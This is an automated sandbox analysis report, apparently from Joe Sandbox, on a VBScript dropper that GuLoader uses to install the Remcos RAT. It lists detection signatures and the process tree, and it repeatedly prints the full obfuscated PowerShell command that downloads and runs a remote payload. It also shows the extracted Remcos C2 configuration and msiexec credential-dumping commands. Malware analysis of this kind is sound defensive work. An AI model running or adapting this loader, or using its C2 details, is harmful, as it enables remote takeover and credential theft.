Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
heteronymous.vbs

Overview

General Information

Sample name:heteronymous.vbs
Analysis ID:1582685
MD5:fc612d46cca59534577f51b16710b323
SHA1:b65ef6cf8e46d38e2ab287f6584c8d456c36202d
SHA256:c43aa71f1636522145ea3e384b2546d5a589260cd7a2cc42688dda5944215b68
Tags:GuLoadervbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4324 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\heteronymous.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo lkostoKaleaAffadAnsvFAbrai Re,l .ykeMult(Brin$ .miS CasnGramyUnmedNont,Unde$MegaSSiphpStereSkakcF krt AnerdenooTr,nf egrlNetvuIn eoLeisrmerki.alem.mpreTrekt.unde Ha,rKraf)';$Spectrofluorimeter=$Intuitionernes;Hypohyaline (Chirked ' Spu$UdkogUd ilBldgoSkarbBag.ATrkkLPubl:DummiBefobStore Spin FroHOlisoBesklEfteT ,haSByg FPa.nLta,ijBa,mTRefrELetuR PurN UnkEIn e2Co o0Supe1 yks=D.kk( suptKre.EsektsFo,fTSves- ndePb huablodtKlarHkara tak$EmposHosppNondEBudtCVandTPlanrs ibO uliF BolLdumpu SacO .inrSkdeIFrosMFr cEOvertCeroe Frur usl)');while (!$Ibenholtsfljterne201) {Hypohyaline (Chirked 'Hjae$Bryng A rlT nfo indb.emiaSmudl,ulg:NondiIsotnhibedRykksT,grk Lu yResed B enKo tiReinnre igG fteKr nnDebusSp d=Poly$P,ofANonipStadodroksE,fetend aBy ns RaniTr.ds.uto8Thr.9') ;Hypohyaline $Honorifical179;Hypohyaline (Chirked 'Ogh.S elltYmpnA MrkRGra tHete-Van s De.LUnfoEFjerEKbelpDdsd Allo4');Hypohyaline (Chirked ',jsk$SeriGEdgilUn uOFeltbIdolAGal lReda:SigniIndebCoune CapNA buHtrfooForbLHr vtOri sTri F UplL tupJStimtDe uE arrr ChaNw rmE Bra2Hagi0 ndk1Fast=Stra(UdbltRechEVestSs.idTTilb-VexipVikaaPa.lTHypohLes Ling$InvoS Malpwad,EPalaC PhaT IntrProloNotefAgt LAntiuunhuO Au.RDe.iIRenvm InteA.reT EufE SitRanti)') ;Hypohyaline (Chirked 'Imme$BadmGGasolBr mOSquibUdokaal eL s.o:ForgMFuglaVareT larAfsno AnkNEfte=Dist$BaraG,ediLAntiOl ndBPropaF rslSt.t: Kooi NonnoptitAdelEUpaarCub FSpreAGaricPatiT A,tICameOm.xon EliaSpecLJour+ O e+Bowl%Defe$ LarT BekHNedhiPlejC MarK IneSAmpuELnudTBag,. SencDi oO ammuTanaNLi eT') ;$Snyd=$thickset[$matron]}$Josines=293205;$Sensibiliseringens=30156;Hypohyaline (Chirked 'Opga$Drvag ubjl UdkoMazuBF jlABe pl oku: FanMHikkAUdrar Ko cP euiEfteODebin DisiOr,fTBe jIInfrc A r Frot=Arbe E,teG.setE ardT il-PallC Ko OMa.knPrect SkaeLoinnCrypt Kon Klap$S arsSk np BraEDiskc U sTSammrTapiOKny.fCos lErhvu Ateo mir HapIFlagMBortERefeT.elleSys,r');Hypohyaline (Chirked 'H rw$vaklgKrselChefo.helbFibeaVaadlSkal:OctaVBizouBrialJu,eg Maca EksrSuf,iF,kls nreU rirHerie.goidBunde ThesForl Ande= To Unun[AcidSStrayBa ns Bolt TileFejlmfuzz. nmeCOveroSal nFo,lv PlaeBl drTh atKurs]Inte:Inve:Un,eFG esrBalso AmtmHaemBSu eaBe,osOmkleWago6Ser,4InceS iptdromrSweei.uddnSunbg Cif(Tran$ MasMHm.gaOpinrTilecOn.uiBlegounspn Holi Al t NaniMa acAmts)');Hypohyaline (Chirked 'Aton$Bn sg DalLMalaOPalpbFutua egfLLder: mas,psinOberaD,mac VenKTrapSStu M on=Bu,b Imbr[C taSFortyAil,SO ertSavnEFlerm D c.KoncTInteEBaraxBrnetDrv ..ideE H lNPh,tcBehroUdmuDBetril.gaNBybeG Var]Slad: ,ac: F rALy.isWareC ,erInakni Sit.C rlG eneHalvtKr ksGrant ekgRundeiNoncNtringExpo( lai$Re oVBracuB ndLrowtG SkaAnrinR ogri UnwsTyskeObjurStume ,usdTillEPeriSUnel)');Hypohyaline (Chirked ' ca $ BilGEnkeLFremORho B P eaEk pL Thr: PresBli OC sevSeriE ebPLactUBestDPalae R.tnTaulS en= cha$TvrlSFremNEftea SkiCen,rKKnubSLens.Fls s elu PipBCo nsGardTManeR uctiDaahnC.oog,rek(Gero$Plu,jToffoEx,iSForeIBen n DexEHerrsF rm,Foul$ Sc S AccEStudnFo,kS Flai mskBHalvIEff lAfsliColeSamazENonmr TolITrvlNJoylgVeneE Disn ResSCapt)');Hypohyaline $Sovepudens;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6592 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo lkostoKaleaAffadAnsvFAbrai Re,l .ykeMult(Brin$ .miS CasnGramyUnmedNont,Unde$MegaSSiphpStereSkakcF krt AnerdenooTr,nf egrlNetvuIn eoLeisrmerki.alem.mpreTrekt.unde Ha,rKraf)';$Spectrofluorimeter=$Intuitionernes;Hypohyaline (Chirked ' Spu$UdkogUd ilBldgoSkarbBag.ATrkkLPubl:DummiBefobStore Spin FroHOlisoBesklEfteT ,haSByg FPa.nLta,ijBa,mTRefrELetuR PurN UnkEIn e2Co o0Supe1 yks=D.kk( suptKre.EsektsFo,fTSves- ndePb huablodtKlarHkara tak$EmposHosppNondEBudtCVandTPlanrs ibO uliF BolLdumpu SacO .inrSkdeIFrosMFr cEOvertCeroe Frur usl)');while (!$Ibenholtsfljterne201) {Hypohyaline (Chirked 'Hjae$Bryng A rlT nfo indb.emiaSmudl,ulg:NondiIsotnhibedRykksT,grk Lu yResed B enKo tiReinnre igG fteKr nnDebusSp d=Poly$P,ofANonipStadodroksE,fetend aBy ns RaniTr.ds.uto8Thr.9') ;Hypohyaline $Honorifical179;Hypohyaline (Chirked 'Ogh.S elltYmpnA MrkRGra tHete-Van s De.LUnfoEFjerEKbelpDdsd Allo4');Hypohyaline (Chirked ',jsk$SeriGEdgilUn uOFeltbIdolAGal lReda:SigniIndebCoune CapNA buHtrfooForbLHr vtOri sTri F UplL tupJStimtDe uE arrr ChaNw rmE Bra2Hagi0 ndk1Fast=Stra(UdbltRechEVestSs.idTTilb-VexipVikaaPa.lTHypohLes Ling$InvoS Malpwad,EPalaC PhaT IntrProloNotefAgt LAntiuunhuO Au.RDe.iIRenvm InteA.reT EufE SitRanti)') ;Hypohyaline (Chirked 'Imme$BadmGGasolBr mOSquibUdokaal eL s.o:ForgMFuglaVareT larAfsno AnkNEfte=Dist$BaraG,ediLAntiOl ndBPropaF rslSt.t: Kooi NonnoptitAdelEUpaarCub FSpreAGaricPatiT A,tICameOm.xon EliaSpecLJour+ O e+Bowl%Defe$ LarT BekHNedhiPlejC MarK IneSAmpuELnudTBag,. SencDi oO ammuTanaNLi eT') ;$Snyd=$thickset[$matron]}$Josines=293205;$Sensibiliseringens=30156;Hypohyaline (Chirked 'Opga$Drvag ubjl UdkoMazuBF jlABe pl oku: FanMHikkAUdrar Ko cP euiEfteODebin DisiOr,fTBe jIInfrc A r Frot=Arbe E,teG.setE ardT il-PallC Ko OMa.knPrect SkaeLoinnCrypt Kon Klap$S arsSk np BraEDiskc U sTSammrTapiOKny.fCos lErhvu Ateo mir HapIFlagMBortERefeT.elleSys,r');Hypohyaline (Chirked 'H rw$vaklgKrselChefo.helbFibeaVaadlSkal:OctaVBizouBrialJu,eg Maca EksrSuf,iF,kls nreU rirHerie.goidBunde ThesForl Ande= To Unun[AcidSStrayBa ns Bolt TileFejlmfuzz. nmeCOveroSal nFo,lv PlaeBl drTh atKurs]Inte:Inve:Un,eFG esrBalso AmtmHaemBSu eaBe,osOmkleWago6Ser,4InceS iptdromrSweei.uddnSunbg Cif(Tran$ MasMHm.gaOpinrTilecOn.uiBlegounspn Holi Al t NaniMa acAmts)');Hypohyaline (Chirked 'Aton$Bn sg DalLMalaOPalpbFutua egfLLder: mas,psinOberaD,mac VenKTrapSStu M on=Bu,b Imbr[C taSFortyAil,SO ertSavnEFlerm D c.KoncTInteEBaraxBrnetDrv ..ideE H lNPh,tcBehroUdmuDBetril.gaNBybeG Var]Slad: ,ac: F rALy.isWareC ,erInakni Sit.C rlG eneHalvtKr ksGrant ekgRundeiNoncNtringExpo( lai$Re oVBracuB ndLrowtG SkaAnrinR ogri UnwsTyskeObjurStume ,usdTillEPeriSUnel)');Hypohyaline (Chirked ' ca $ BilGEnkeLFremORho B P eaEk pL Thr: PresBli OC sevSeriE ebPLactUBestDPalae R.tnTaulS en= cha$TvrlSFremNEftea SkiCen,rKKnubSLens.Fls s elu PipBCo nsGardTManeR uctiDaahnC.oog,rek(Gero$Plu,jToffoEx,iSForeIBen n DexEHerrsF rm,Foul$ Sc S AccEStudnFo,kS Flai mskBHalvIEff lAfsliColeSamazENonmr TolITrvlNJoylgVeneE Disn ResSCapt)');Hypohyaline $Sovepudens;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3136 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1892 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fxqlydinmzxw" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 940 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\prvvzwtgahpigxth" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4712 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ztjoaodiophnilhlqlz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["154.216.18.62:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-D98D6X", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2500148834.00000000088E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000007.00000003.2616047029.0000000008465000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000007.00000002.3434646364.0000000008465000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 9 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_1076.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_6592.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc37f:$b2: ::FromBase64String(
              • 0xb3f1:$s1: -join
              • 0x4b9d:$s4: +=
              • 0x4c5f:$s4: +=
              • 0x8e86:$s4: +=
              • 0xafa3:$s4: +=
              • 0xb28d:$s4: +=
              • 0xb3d3:$s4: +=
              • 0x1535c:$s4: +=
              • 0x153dc:$s4: +=
              • 0x154a2:$s4: +=
              • 0x15522:$s4: +=
              • 0x156f8:$s4: +=
              • 0x1577c:$s4: +=
              • 0xbc18:$e4: Get-WmiObject
              • 0xbe07:$e4: Get-Process
              • 0xbe5f:$e4: Start-Process
              • 0x16002:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\heteronymous.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\heteronymous.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\heteronymous.vbs", ProcessId: 4324, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.136.42, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3136, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49905
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo lkostoKaleaAffadAnsvFAbrai Re,l .ykeMult(Brin$ .miS Casn
